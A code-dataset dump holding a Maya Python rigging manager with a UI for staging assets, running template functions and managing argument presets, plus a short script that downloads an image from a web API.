blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
281
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
57
| license_type
stringclasses 2
values | repo_name
stringlengths 6
116
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 313
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 18.2k
668M
⌀ | star_events_count
int64 0
102k
| fork_events_count
int64 0
38.2k
| gha_license_id
stringclasses 17
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 107
values | src_encoding
stringclasses 20
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 4
6.02M
| extension
stringclasses 78
values | content
stringlengths 2
6.02M
| authors
listlengths 1
1
| author
stringlengths 0
175
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
649d3305c8a94ba9233b0341f2e5877d71f30475
|
79ea04b61afc43231dfdc76f290356af46598914
|
/FRW/manager.py
|
284daa87f29a5c755671f1ad31ca4ef1eac95ffb
|
[
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
] |
permissive
|
PearseT/Maya_scripts
|
21b3abd78b7c132e5b28182f23d181050ec2b112
|
037fe39b1b4928dce6f967c710ecc0d1d087502d
|
refs/heads/master
| 2020-06-03T04:23:17.990529
| 2019-12-03T13:46:30
| 2019-12-03T13:46:30
| 191,436,434
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 26,731
|
py
|
# TODO:
# importDeformerWeights to perform auto-binding for some of the more common deformers like skinCluster, cluster, etc.
# quadruped
import sys, os, imp, inspect, shutil, glob, platform, __main__
from functools import partial
import maya.cmds as mc
THIS_DIR, THIS_FILE = os.path.split(__file__)
sys.path.append(THIS_DIR)
THIS_FILE_NAME = os.path.splitext(THIS_FILE)[0]
def __initialize():
global STAGING_DIR, ASSET_TYPES, EDITOR, CACHE
STAGING_DIR = ASSET_TYPES = EDITOR = None
CACHE = {}
LIB_CACHE = {}
def main(force=False):
if force:
if mc.dockControl("dc_FRW", ex=True) == True:
mc.deleteUI("dc_FRW")
if mc.window("w_FRW", ex=True):
mc.deleteUI("w_FRW")
if not mc.window("w_FRW", ex=True):
a = mc.window("w_FRW", t="the Fastest Rig in the West")
tl = mc.tabLayout()
tab1 = mc.paneLayout(cn="horizontal3", st=1, shp=1, ps=[(1,1,1),(2,1,99),(3,1,1)])
mc.columnLayout(adj=True)
mc.rowLayout(nc=5, adj=4)
mc.iconTextButton(st="iconOnly", i1="QR_add.png", ann="create new asset", c=__createAsset_ui)
mc.iconTextButton(st="iconOnly", i1="QR_delete.png", ann="delete selected asset", c=__deleteAsset)
mc.iconTextButton(st="iconOnly", i1="CN_refresh.png", ann="update assets list", c=__update)
mc.text(l="")
mc.iconTextButton(st="iconOnly", i1="UVEditorSnapshot.png", ann="update icon", c=__icon)
mc.setParent("..")
mc.rowLayout(nc=3, adj=2)
mc.textScrollList("tsl_type_FRW", w=100, h=200, sc=__updateNames)
mc.textScrollList("tsl_name_FRW", w=170, h=200, sc=__updateIconAndPath)
mc.image("img_FRW", w=200, h=200)
mc.setParent("..")
mc.rowLayout(nc=2, adj=1)
mc.textField("tf_path_FRW", ed=False)
mc.iconTextButton(st="iconOnly", i1="passSetRelationEditor.png", ann="edit", c=__edit)
mc.setParent("..")
mc.setParent("..")
mc.scrollLayout("sl_inspector_FRW", bv=True)
mc.setParent("..")
mc.button("b_execute_FRW", l="execute", c=__execute)
mc.setParent("..")
tab2 = mc.scrollLayout(bv=True)
mc.columnLayout("cl_library_FRW", adj=True, rs=5)
mc.setParent("..")
mc.setParent("..")
tab3 = mc.scrollLayout(bv=True)
mc.columnLayout("cl_extensions_FRW", adj=True, rs=5)
mc.setParent("..")
mc.setParent("..")
mc.tabLayout(tl, e=True, tl=[(tab1, "builder"), (tab2, "library"), (tab3, "extensions")])
if not mc.dockControl("dc_FRW", ex=True):
mc.dockControl("dc_FRW", l="the Fastest Rig in the West", con="w_FRW", aa=["left","right"], a="left", w=1)
mc.dockControl("dc_FRW", e=True, fl=True)
else:
mc.dockControl("dc_FRW", e=True, vis=True)
__initialize()
__update()
__library()
__extensions()
def __update(*arg):
__config()
si = None
if mc.textScrollList("tsl_type_FRW", q=True, nsi=True):
si = mc.textScrollList("tsl_type_FRW", q=True, si=True)[0]
mc.textScrollList("tsl_type_FRW", e=True, ra=True)
if os.path.isdir(STAGING_DIR):
for d in os.listdir(STAGING_DIR):
mc.textScrollList("tsl_type_FRW", e=True, a=d)
if d == si:
mc.textScrollList("tsl_type_FRW", e=True, si=d)
__updateNames()
def __config():
if not os.path.isfile(THIS_DIR+"/"+THIS_FILE_NAME+".cfg"): return
f = open(THIS_DIR+"/"+THIS_FILE_NAME+".cfg")
l = f.readlines()
f.close()
for line in l:
line = line.strip()
if "=" not in line: continue
line = line.split("=")
if len(line) != 2: continue
key = line[0].strip()
if key == "STAGING_DIR":
global STAGING_DIR
STAGING_DIR = THIS_DIR+"/staging/"
value = eval(line[1].strip())
if type(value) == str or type(value) == unicode:
if value[-1] != "/": value += "/"
STAGING_DIR = value
elif key == "ASSET_TYPES":
global ASSET_TYPES
ASSET_TYPES = eval(line[1].strip())
elif key == "EDITOR":
global EDITOR
EDITOR = line[1].strip()
def __updateNames():
si = None
if mc.textScrollList("tsl_name_FRW", q=True, nsi=True):
si = mc.textScrollList("tsl_name_FRW", q=True, si=True)[0]
mc.textScrollList("tsl_name_FRW", e=True, ra=True)
if mc.textScrollList("tsl_type_FRW", q=True, nsi=True):
t = mc.textScrollList("tsl_type_FRW", q=True, si=True)[0]
if os.path.isdir(STAGING_DIR):
for d in os.listdir(STAGING_DIR+"/"+t):
mc.textScrollList("tsl_name_FRW", e=True, a=d)
if d == si:
mc.textScrollList("tsl_name_FRW", e=True, si=d)
__updateIconAndPath()
def __updateIconAndPath():
mc.textField("tf_path_FRW", e=True, tx="")
mc.image("img_FRW", e=True, i=THIS_DIR+"/frw.png")
if mc.textScrollList("tsl_type_FRW", q=True, nsi=True):
t = mc.textScrollList("tsl_type_FRW", q=True, si=True)[0]
if mc.textScrollList("tsl_name_FRW", q=True, nsi=True):
n = mc.textScrollList("tsl_name_FRW", q=True, si=True)[0]
f = STAGING_DIR+"/"+t+"/"+n+"/"+n+".py"
if os.path.isfile(f):
mc.textField("tf_path_FRW", e=True, tx=f)
f = f[:-3]+".png"
if os.path.isfile(f):
mc.image("img_FRW", e=True, i=f)
__updateInspector()
# Updates the inspector according to the contents (functions and signatures) of the template script.
# Stores useful information in a global cache, accessible from everywhere in the code.
def __updateInspector():
global CACHE
CACHE = {"index":{}, "function":{}, "execute":{}}
mc.button("b_execute_FRW", e=True, en=False)
l = mc.scrollLayout("sl_inspector_FRW", q=True, ca=True) or []
if len(l): mc.deleteUI(l)
if mc.textScrollList("tsl_type_FRW", q=True, nsi=True):
t = mc.textScrollList("tsl_type_FRW", q=True, si=True)[0]
if mc.textScrollList("tsl_name_FRW", q=True, nsi=True):
CACHE["name"] = mc.textScrollList("tsl_name_FRW", q=True, si=True)[0]
CACHE["file"] = STAGING_DIR+t+"/"+CACHE["name"]+"/"+CACHE["name"]+".py"
if os.path.isfile(CACHE["file"]):
m = imp.load_source(CACHE["name"], CACHE["file"])
for n, o in inspect.getmembers(m, inspect.isfunction):
CACHE["index"][o.__code__.co_firstlineno] = [n, inspect.getargspec(o)]
ids = sorted(CACHE["index"].viewkeys()); c = len(ids)
for i in range(c):
if i == 0: mc.button("b_execute_FRW", e=True, en=True)
fn = CACHE["index"][ids[i]][0]
CACHE["function"][fn] = {"checkbox":None, "arguments":{}, "presets":{}}
mc.rowLayout(nc=10, adj=2, p="sl_inspector_FRW")
cb = mc.iconTextCheckBox(i="checkboxOff.png", si="checkboxOn.png",
v=__loadStatePreset(fn), cc=partial(__saveStatePreset, ids[i]))
CACHE["function"][fn]["checkbox"] = cb
mc.text(l=CACHE["index"][ids[i]][0], w=250, al="left", fn="fixedWidthFont")
ab = mc.iconTextButton(st="iconOnly", i1="fileOpen.png", ann="load preset", vis=False, c=partial(__loadAllArgPresets, ids[i]))
eb = mc.iconTextButton(st="iconOnly", i1="fileSave.png", ann="save preset", vis=False, c=partial(__saveAllArgPresets, ids[i]))
db = mc.iconTextButton(st="iconOnly", i1="QR_delete.png", ann="delete preset", vis=False, c=partial(__deleteAllArgPresets, ids[i]))
rv = mc.iconTextButton(st="iconOnly", i1="RS_disable.png", ann="reset value", vis=False, c=partial(__resetAllArgValues, ids[i]))
mc.text(l="", w=5)
CACHE["function"][fn]["error"] = mc.image(i="RS_WarningOldCollection", vis=False)
e = mc.iconTextButton(st="iconOnly", i1="timeplay.png", c=partial(__execute, ids[i]))
CACHE["execute"][e] = CACHE["index"][ids[i]][0]
mc.setParent("..")
arg_nms = CACHE["index"][ids[i]][1][0]; c_nms = len(arg_nms)
arg_val = CACHE["index"][ids[i]][1][3] or []; c_val = len(arg_val)
offset = c_nms - c_val
# arguments
for j in range(offset):
if j == 0:
for s in [ab, eb, db, rv]: mc.iconTextButton(s, e=True, vis=True)
tfg, img = __argumentWidget(j, ids[i], CACHE["index"][ids[i]][0], arg_nms[j], None)
CACHE["function"][fn]["arguments"][arg_nms[j]] = tfg
CACHE["function"][fn]["presets"][arg_nms[j]] = img
# keyword arguments
for j in range(c_val):
if j == 0:
for s in [ab, eb, db, rv]: mc.iconTextButton(s, e=True, vis=True)
jj = j+offset
tfg, img = __argumentWidget(jj, ids[i], CACHE["index"][ids[i]][0], arg_nms[jj], arg_val[j])
CACHE["function"][fn]["arguments"][arg_nms[jj]] = tfg
CACHE["function"][fn]["presets"][arg_nms[jj]] = img
if i < c-1: mc.separator(st="in", w=435, h=10, p="sl_inspector_FRW")
# Load at once any available presets for the arguments of the inspected function.
__loadArgPreset(ids[i], arg_nms)
def __argumentWidget(i, idx, fn, arg_nam, arg_val, presets=True):
mc.rowLayout(nc=2, adj=True)
tfg = mc.textFieldGrp(l=arg_nam, tx=str(arg_val))
if presets:
mc.popupMenu()
mc.menuItem("load preset", i="folder-open.png", c=partial(__loadArgPreset, idx, [arg_nam]))
mc.menuItem("save preset", i="UVTkSaveValue.png", c=partial(__saveArgPreset, idx, fn+"."+arg_nam))
mc.menuItem("delete preset", i="RS_delete.png", c=partial(__deleteArgPreset, idx, fn+"."+arg_nam))
mc.menuItem(d=True)
mc.menuItem("reset value", i="RS_disable.png", c=partial(__resetArgValue, idx, arg_nam))
img = mc.image(i="Bookmark.png", vis=False)
else: img = None
mc.setParent("..")
return tfg, img
def __icon(*arg):
if "file" not in CACHE.viewkeys(): return
mc.select(cl=True)
for e in mc.lsUI(ed=True):
try: mc.viewFit(p=e)
except: pass
f = CACHE["file"][:-3]+".png"
if os.path.isfile(f): os.remove(f)
fmt = mc.getAttr("defaultRenderGlobals.imageFormat")
mc.setAttr("defaultRenderGlobals.imageFormat", 32)
i = mc.playblast(cf=f, fmt="image", cc=False, fr=1, v=False, orn=False, os=True, p=100, wh=[200,200], qlt=100)
mc.setAttr("defaultRenderGlobals.imageFormat", fmt)
mc.image("img_FRW", e=True, i=f)
# edit build template
def __edit(*arg):
if "file" not in CACHE.viewkeys(): return
if not os.path.isfile(CACHE["file"]):
mc.confirmDialog(t=" ", m="File not found: "+CACHE["file"], b="ok")
return
if platform.system() == "Windows": os.system("start "+EDITOR+" "+CACHE["file"])
else: os.system(EDITOR+" "+CACHE["file"]+"&")
# edit library
def __edit2(*arg):
if not os.path.isfile(arg[0]):
mc.confirmDialog(t=" ", m="File not found: "+arg[0], b="ok")
return
if platform.system() == "Windows": os.system("start "+EDITOR+" "+arg[0])
else: os.system(EDITOR+" "+arg[0]+"&")
def __extensions():
l = mc.columnLayout("cl_extensions_FRW", q=True, ca=True) or []
if len(l) > 0: mc.deleteUI(l)
mc.columnLayout(p="cl_extensions_FRW")
mc.iconTextButton(st="iconOnly", i1="CN_refresh.png", ann="update", c=__extensions)
mc.setParent("..")
__main__.FRW_DIR = THIS_DIR
d = THIS_DIR+"/extensions/"
if not os.path.isdir(d): return
for f in glob.glob(d+"*.py"):
try:
n = os.path.splitext(os.path.split(f)[1])[0]
m = imp.load_source(n, f)
fl = mc.frameLayout(l=n, bv=True, cll=True, mw=5, mh=5, p="cl_extensions_FRW")
m.main()
mc.setParent("..")
mc.frameLayout(fl, e=True, cl=False)
mc.frameLayout(fl, e=True, cl=True)
except Exception as e:
print("Extension: "+f)
print(" Error: "+str(e))
def __library():
l = mc.columnLayout("cl_library_FRW", q=True, ca=True) or []
if len(l) > 0: mc.deleteUI(l)
mc.columnLayout(p="cl_library_FRW")
mc.iconTextButton(st="iconOnly", i1="CN_refresh.png", ann="update", c=__library)
mc.setParent("..")
if not os.path.isdir(THIS_DIR): return
global LIB_CACHE
LIB_CACHE = {}
for f in glob.glob(THIS_DIR+"/*.py"):
f = f.replace("\\", "/")
n = os.path.splitext(os.path.split(f)[1])[0]
try: m = imp.load_source(n, f)
except Exception as e:
print("Library: "+f)
print(" Error: "+str(e))
continue
fl = mc.frameLayout(l=n, bv=True, cll=True, cl=True, mw=15, mh=15, p="cl_library_FRW")
mc.rowLayout(nc=2, adj=1)
mc.textField(tx=f, ed=False)
mc.iconTextButton(st="iconOnly", i1="passSetRelationEditor.png", ann="edit", c=partial(__edit2, f))
mc.setParent("..")
mc.separator(st="in", w=420, h=10)
LIB_CACHE[f] = {}
for n, o in inspect.getmembers(m, inspect.isfunction):
LIB_CACHE[f][o.__code__.co_firstlineno] = [n, inspect.getargspec(o)]
ids = sorted(LIB_CACHE[f].viewkeys()); c = len(ids)
for i in range(c):
fn = LIB_CACHE[f][ids[i]][0]
arg_nms = LIB_CACHE[f][ids[i]][1][0]; c_nms = len(arg_nms)
arg_val = LIB_CACHE[f][ids[i]][1][3] or []; c_val = len(arg_val)
mc.frameLayout(l=fn, bv=True, cll=True, cl=True, mw=5, mh=5, fn="smallPlainLabelFont")
mc.rowLayout(nc=2, adj=1)
mc.text(l="")#fn, al="left", fn="fixedWidthFont")
e = mc.iconTextButton(st="iconOnly", i1="timeplay.png", c=partial(__execute2, f, ids[i]))
mc.setParent("..")
if c_nms > 0:
LIB_CACHE[f][ids[i]].append({})
offset = c_nms - c_val
# arguments
for j in range(offset):
LIB_CACHE[f][ids[i]][2][arg_nms[j]] = __argumentWidget(j, ids[i], LIB_CACHE[f][ids[i]][1][0], arg_nms[j], None, presets=False)[0]
# keyword arguments
for j in range(c_val):
jj = j+offset
LIB_CACHE[f][ids[i]][2][arg_nms[jj]] = __argumentWidget(jj, ids[i], LIB_CACHE[f][ids[i]][1][0], arg_nms[jj], arg_val[j], presets=False)[0]
# if i < c-1: mc.separator(st="in", h=10)
mc.setParent("..")
mc.frameLayout(fl, e=True, cl=False)
mc.frameLayout(fl, e=True, cl=True)
#
# argument presets
#
def __loadAllArgPresets(*arg):
if not os.path.isfile(CACHE["file"]):
mc.confirmDialog(t=" ", m="File not found: "+CACHE["file"], b="ok")
return
f = CACHE["file"][:-3]+".pre"
if os.path.isfile(f):
fn = CACHE["index"][arg[0]][0]
f = open(f); lines = f.readlines(); f.close()
for line in lines:
line = line.strip()
if "=" not in line: continue
l = line.split("=")
if not "." in l[0]: continue
fn2, arg2 = l[0].strip().split(".")
if fn != fn2: continue
for arg in CACHE["function"][fn]["arguments"].viewkeys():
if arg != arg2: continue
tfg = CACHE["function"][fn]["arguments"][arg]
mc.textFieldGrp(tfg, e=True, tx=l[1].strip())
img = CACHE["function"][fn]["presets"][arg]
mc.image(img, e=True, vis=True)
def __saveAllArgPresets(*arg):
if not os.path.isfile(CACHE["file"]):
mc.confirmDialog(t=" ", m="File not found: "+CACHE["file"], b="ok")
return
fn = CACHE["index"][arg[0]][0]
filepath = CACHE["file"][:-3]+".pre"
if os.path.isfile(filepath):
f = open(filepath); l = f.readlines(); f.close()
for arg in CACHE["function"][fn]["arguments"].viewkeys():
add = False
for i in range(len(l)):
s = l[i].strip()
if "=" not in s: continue
l2 = s.split("=")
if "." not in l2[0]: continue
if fn+"."+arg != l2[0].strip(): continue
add = True
tfg = CACHE["function"][fn]["arguments"][arg]
val = mc.textFieldGrp(tfg, q=True, tx=True)
l[i] = fn+"."+arg+" = "+str(val)+"\n"
img = CACHE["function"][fn]["presets"][arg]
mc.image(img, e=True, vis=True)
break
if not add:
tfg = CACHE["function"][fn]["arguments"][arg]
val = mc.textFieldGrp(tfg, q=True, tx=True)
l.append(fn+"."+arg+" = "+str(val)+"\n")
img = CACHE["function"][fn]["presets"][arg]
mc.image(img, e=True, vis=True)
else:
l = []
for arg in CACHE["function"][fn]["arguments"].viewkeys():
tfg = CACHE["function"][fn]["arguments"][arg]
val = mc.textFieldGrp(tfg, q=True, tx=True)
l.append(fn+"."+arg+" = "+str(val)+"\n")
img = CACHE["function"][fn]["presets"][arg]
mc.image(img, e=True, vis=True)
f = open(filepath, "w"); f.writelines(l); f.close()
def __deleteAllArgPresets(*arg):
if not os.path.isfile(CACHE["file"]):
mc.confirmDialog(t=" ", m="File not found: "+CACHE["file"], b="ok")
return
idx = arg[0]
fn = CACHE["index"][idx][0]
filepath = CACHE["file"][:-3]+".pre"
if os.path.isfile(filepath):
f = open(filepath); l = f.readlines(); f.close()
for arg in CACHE["function"][fn]["arguments"].viewkeys():
for i in range(len(l)):
s = l[i].strip()
if "=" not in s: continue
l2 = s.split("=")
if "." not in l2[0]: continue
if fn+"."+arg != l2[0].strip(): continue
__resetArgValue(idx, arg)
l.pop(i)
img = CACHE["function"][fn]["presets"][arg]
mc.image(img, e=True, vis=False)
break
f = open(filepath, "w"); f.writelines(l); f.close()
def __resetAllArgValues(*arg):
if not os.path.isfile(CACHE["file"]):
mc.confirmDialog(t=" ", m="File not found: "+CACHE["file"], b="ok")
return
for arg2 in CACHE["function"][CACHE["index"][arg[0]][0]]["arguments"].viewkeys():
__resetArgValue(arg[0], arg2)
def __loadStatePreset(*arg):
if not os.path.isfile(CACHE["file"]):
mc.confirmDialog(t=" ", m="File not found: "+CACHE["file"], b="ok")
return True
f = CACHE["file"][:-3]+".pre"
if os.path.isfile(f):
f = open(f); lines = f.readlines(); f.close()
for line in lines:
line = line.strip()
if "=" not in line: continue
l = line.split("=")
if "." in l[0]: continue
if arg[0] != l[0].strip(): continue
return eval(l[1])
return True
def __saveStatePreset(*arg):
if not os.path.isfile(CACHE["file"]):
mc.confirmDialog(t=" ", m="File not found: "+CACHE["file"], b="ok")
return
cb = CACHE["function"][CACHE["index"][arg[0]][0]]["checkbox"]
val = str(mc.iconTextCheckBox(cb, q=True, v=True))
fn = CACHE["index"][arg[0]][0]
filepath = CACHE["file"][:-3]+".pre"
if os.path.isfile(filepath):
add = False
f = open(filepath); l = f.readlines(); f.close()
for i in range(len(l)):
s = l[i].strip()
if "=" not in s: continue
l2 = s.split("=")
if "." in l2[0]: continue
if fn != l2[0].strip(): continue
add = True
l[i] = fn+" = "+val+"\n"
break
if not add: l.append(fn+" = "+val+"\n")
f = open(filepath, "w"); f.writelines(l); f.close()
else:
s = fn+" = "+val+"\n"
f = open(filepath, "w"); f.write(s); f.close()
def __loadArgPreset(*arg):
if not os.path.isfile(CACHE["file"]):
mc.confirmDialog(t=" ", m="File not found: "+CACHE["file"], b="ok")
return
f = CACHE["file"][:-3]+".pre"
if not os.path.isfile(f): lines = []
else:
f = open(f); lines = f.readlines(); f.close()
idx = arg[0]
fn = CACHE["index"][idx][0]
args = arg[1]
for arg in args:
img = CACHE["function"][CACHE["index"][idx][0]]["presets"][arg]
mc.image(img, e=True, vis=False)
for line in lines:
line = line.strip()
if "=" not in line: continue
l = line.split("=")
if "." not in l[0]: continue
fn2, arg2 = l[0].strip().split(".")
if fn != fn2 or arg != arg2: continue
tfg = CACHE["function"][CACHE["index"][idx][0]]["arguments"][arg]
mc.textFieldGrp(tfg, e=True, tx=("=".join(s for s in l[1:])).strip())
mc.image(img, e=True, vis=True)
def __saveArgPreset(*arg):
if not os.path.isfile(CACHE["file"]):
mc.confirmDialog(t=" ", m="File not found: "+CACHE["file"], b="ok")
return
idx = arg[0]
fn, arg = arg[1].split(".")
filepath = CACHE["file"][:-3]+".pre"
if os.path.isfile(filepath):
add = False
f = open(filepath); l = f.readlines(); f.close()
for i in range(len(l)):
s = l[i].strip()
if "=" not in s: continue
l2 = s.split("=")
if "." not in l2[0]: continue
if fn+"."+arg != l2[0].strip(): continue
add = True
tfg = CACHE["function"][CACHE["index"][idx][0]]["arguments"][arg]
val = mc.textFieldGrp(tfg, q=True, tx=True)
l[i] = fn+"."+arg+" = "+str(val)+"\n"
break
if not add:
tfg = CACHE["function"][CACHE["index"][idx][0]]["arguments"][arg]
val = mc.textFieldGrp(tfg, q=True, tx=True)
l.append(fn+"."+arg+" = "+str(val)+"\n")
f = open(filepath, "w"); f.writelines(l); f.close()
else:
tfg = CACHE["function"][CACHE["index"][idx][0]]["arguments"][arg]
val = mc.textFieldGrp(tfg, q=True, tx=True)
s = fn+"."+arg+" = "+str(val)+"\n"
f = open(filepath, "w"); f.write(s); f.close()
img = CACHE["function"][CACHE["index"][idx][0]]["presets"][arg]
mc.image(img, e=True, vis=True)
def __deleteArgPreset(*arg):
if not os.path.isfile(CACHE["file"]):
mc.confirmDialog(t=" ", m="File not found: "+CACHE["file"], b="ok")
return
idx = arg[0]
fn, arg = arg[1].split(".")
filepath = CACHE["file"][:-3]+".pre"
if os.path.isfile(filepath):
f = open(filepath); l = f.readlines(); f.close()
for i in range(len(l)):
s = l[i].strip()
if "=" not in s: continue
l2 = s.split("=")
if "." not in l2[0]: continue
if fn+"."+arg == l2[0].strip():
l.pop(i)
f = open(filepath, "w"); f.writelines(l); f.close()
__resetArgValue(idx, arg)
break
img = CACHE["function"][CACHE["index"][idx][0]]["presets"][arg]
mc.image(img, e=True, vis=False)
def __resetArgValue(*arg):
nms = CACHE["index"][arg[0]][1][0]; c_nms = len(nms)
val = CACHE["index"][arg[0]][1][3] or []; c_val = len(val)
offset = c_nms - c_val
for i in range(c_nms):
if arg[1] == nms[i]: break
tfg = CACHE["function"][CACHE["index"][arg[0]][0]]["arguments"][arg[1]]
if c_nms != c_val:
if i < offset: mc.textFieldGrp(tfg, e=True, tx="None")
else: mc.textFieldGrp(tfg, e=True, tx=str(val[i-offset]))
else: mc.textFieldGrp(tfg, e=True, tx=str(val[i]))
#
# execute code from inspector
#
def __execute(*arg):
if not os.path.isfile(CACHE["file"]):
mc.confirmDialog(t=" ", m="File not found: "+CACHE["file"], b="ok")
return
cmd = CACHE["name"]+'=imp.load_source("'+CACHE["name"]+'", "'+CACHE["file"]+'")'
print("import imp\n"+cmd); exec(cmd)
for idx in sorted(CACHE["index"].viewkeys()):
fn = CACHE["index"][idx][0]
mc.image(CACHE["function"][fn]["error"], e=True, vis=False)
if type(arg[0]) != int:
if not mc.iconTextCheckBox(CACHE["function"][fn]["checkbox"], q=True, v=True):
continue
elif idx != arg[0]:
continue
cmd = CACHE["name"]+"."+fn+"("+__arguments(idx)+")"
print(cmd)
try: exec(cmd)
except Exception as e:
mc.image(CACHE["function"][fn]["error"], e=True, vis=True)
raise Exception(e)
if type(arg[0]) == bool: __icon()
def __arguments(idx):
arg = ""
nms = CACHE["index"][idx][1][0]; cnt_nms = len(nms)
val = CACHE["index"][idx][1][3] or []; cnt_val = len(val)
off = cnt_nms-cnt_val
for i in range(off):
tfg = CACHE["function"][CACHE["index"][idx][0]]["arguments"][nms[i]]
val = mc.textFieldGrp(tfg, q=True, tx=True)
try: val = eval(val)
except: val = '"'+val+'"'
arg += str(val)
if cnt_nms != cnt_val: arg += ", "
for i in range(cnt_val):
tfg = CACHE["function"][CACHE["index"][idx][0]]["arguments"][nms[i+off]]
val = mc.textFieldGrp(tfg, q=True, tx=True)
try: val = eval(val)
except: val = '"'+val+'"'
arg += nms[i+off]+"="+str(val)
if i < cnt_val-1: arg += ", "
return arg
#
# execute code from library
#
def __execute2(*arg):
if not os.path.isfile(arg[0]):
mc.confirmDialog(t=" ", m="File not found: "+arg[0], b="ok")
return
n = os.path.split(os.path.splitext(arg[0])[0])[1]
cmd = n+'=imp.load_source("'+n+'", "'+arg[0]+'")'
print("import imp\n"+cmd); exec(cmd)
cmd = n+"."+LIB_CACHE[arg[0]][arg[1]][0]+"("+__arguments2(arg[0], arg[1])+")"
print(cmd); exec(cmd)
def __arguments2(f, idx):
arg = ""
nms = LIB_CACHE[f][idx][1][0]; cnt_nms = len(nms)
val = LIB_CACHE[f][idx][1][3] or []; cnt_val = len(val)
off = cnt_nms-cnt_val
for i in range(off):
tfg = LIB_CACHE[f][idx][2][nms[i]]
val = mc.textFieldGrp(tfg, q=True, tx=True)
try: val = eval(val)
except: val = '"'+val+'"'
arg += str(val)
if cnt_nms != cnt_val: arg += ", "
for i in range(cnt_val):
tfg = LIB_CACHE[f][idx][2][nms[i+off]]
val = mc.textFieldGrp(tfg, q=True, tx=True)
try: val = eval(val)
except: val = '"'+val+'"'
arg += nms[i+off]+"="+str(val)
if i < cnt_val-1: arg += ", "
return arg
#
# create/delete assets
#
def __createAsset_ui(*arg):
mc.layoutDialog(ui=__createAsset_dlg, t="create new asset")
def __createAsset_dlg():
mc.columnLayout(adj=True)
mc.rowLayout(nc=2, adj=2)
mc.text(l="rig type", al="right", w=80)
mc.optionMenu("om_rigType_FRW")
for f in glob.glob(THIS_DIR+"/*.ma"):
mc.menuItem(l=os.path.splitext(os.path.split(f)[1])[0])
mc.setParent("..")
mc.rowLayout(nc=2, adj=2)
mc.text(l="asset type", al="right", w=80)
mc.optionMenu("om_assetType_FRW")
for t in ASSET_TYPES: mc.menuItem(l=t)
mc.setParent("..")
mc.rowLayout(nc=2, adj=2)
mc.text(l="asset name", al="right", w=80)
mc.textField("tf_assetName_FRW")
mc.setParent("..")
mc.text(l="")
mc.rowColumnLayout(nc=2, cw=[(1,148),(2,148)])
mc.button(l="create", c=__createAsset_stage)
mc.button(l="cancel", c=__createAsset_cancel)
mc.setParent("..")
mc.setParent("..")
def __createAsset_cancel(*arg): mc.layoutDialog(dis="cancel")
def __createAsset_stage(*arg):
n = mc.textField("tf_assetName_FRW", q=True, tx=True).strip()
if not n:
mc.confirmDialog(t=" ", m="Incorrect asset name.", b="ok")
return
rt = mc.optionMenu("om_rigType_FRW", q=True, v=True)
at = mc.optionMenu("om_assetType_FRW", q=True, v=True)
f = STAGING_DIR+at+"/"+n+"/"+n+".py"
if os.path.isfile(f):
result = mc.confirmDialog(t="overwrite existing asset",
m="Asset with this name already exists. Do you want to overwrite it ?",
b=["yes","no"], cb="no", ds="no", db="no")
if result == "no": return
createAsset(rt, at, n)
mc.layoutDialog(dis="cancel")
__update()
mc.textScrollList("tsl_type_FRW", e=True, si=at)
__updateNames()
mc.textScrollList("tsl_name_FRW", e=True, si=n)
__update()
def createAsset(rigType, assetType, assetName):
directory = STAGING_DIR+assetType+"/"+assetName+"/"
try: os.makedirs(directory)
except: pass
if not os.path.isdir(directory):
raise Exception("Cannot create directory: "+directory)
filepath = directory+assetName+".py"
try: shutil.copy(THIS_DIR+"/template.py", filepath)
except: raise Exception("Cannot create file: "+filepath)
try: os.makedirs(directory+"/weights")
except: pass
try: os.remove(filepath[:-3]+".pre")
except: pass
if not os.path.isfile(THIS_DIR+"/"+rigType+".py"): rigType = "generic"
for f in glob.glob(THIS_DIR+"/"+rigType+".*"):
ext = os.path.splitext(f)[1]
if ext == ".py" or ext == ".pyc": continue
shutil.copy(f, directory+assetName+ext)
m = imp.load_source(rigType, THIS_DIR+"/"+rigType+".py")
for n, o in inspect.getmembers(m, inspect.isfunction):
if n == "main":
args = inspect.getargspec(o)
args1 = ", ".join((a+"="+str(b), a+'="'+str(b)+'"')[type(b) == str] for a,b in zip(args[0],args[3]))
args2 = ", ".join(a+"="+a for a in args[0])
f = open(filepath); s = f.read(); f.close()
s = s.replace("FRW_DIR", THIS_DIR).replace("FRW_RIG", rigType)
s = s.replace("FRW_ARG2", args2).replace("FRW_ARG", args1)
f = open(filepath, "w"); f.write(s); f.close()
break
print("Result: "+filepath)
return filepath
def __deleteAsset(*arg):
if "file" not in CACHE.viewkeys(): return
d = os.path.split(CACHE["file"])[0]
if not os.path.isdir(d):
mc.confirmDialog(t=" ", m="Invalid asset.", b="ok")
return
result = mc.confirmDialog(t="delete asset",
m="Do you want to delete the selected asset ?",
b=["yes","no"], cb="no", ds="no", db="no")
if result == "no": return
try: shutil.rmtree(d)
except: raise Exception("Cannot delete directory: "+d)
__update()
|
[
"pearsetoomey@gmail.com"
] |
pearsetoomey@gmail.com
|
0a884db25123476946a8d29963a9b291c969e426
|
aa89d7e6dfcf1da91fd5dfed6b966f342c24cc16
|
/p.py
|
b4757ebf5434fb383faf678e34598c858773c642
|
[] |
no_license
|
nanfeng-web/mine-pictures
|
6aad709904b07acd288603f793759b707e9f4b04
|
7a7cd2f3de63feacac7fd6824b9fc030eb8e23b3
|
refs/heads/main
| 2023-08-07T09:52:05.801232
| 2021-10-01T09:02:44
| 2021-10-01T09:02:44
| 399,729,566
| 1
| 0
| null | 2021-09-23T23:58:45
| 2021-08-25T07:29:52
| null |
UTF-8
|
Python
| false
| false
| 149
|
py
|
import requests
response = requests.get("https://api.nmb.show/1985acg.php")
file = open("paqu","wb")
file.write(response.content)
file.close()
|
[
"noreply@github.com"
] |
noreply@github.com
|
f9dd6d91e8aaee9919ed20cb74c14fc6f2d22c8b
|
44c81d8cc9c148c93cf9a77faec345693059c973
|
/fetch.py
|
568adf1e9271c6ebe976f93a3b0c8306a2ea428a
|
[] |
no_license
|
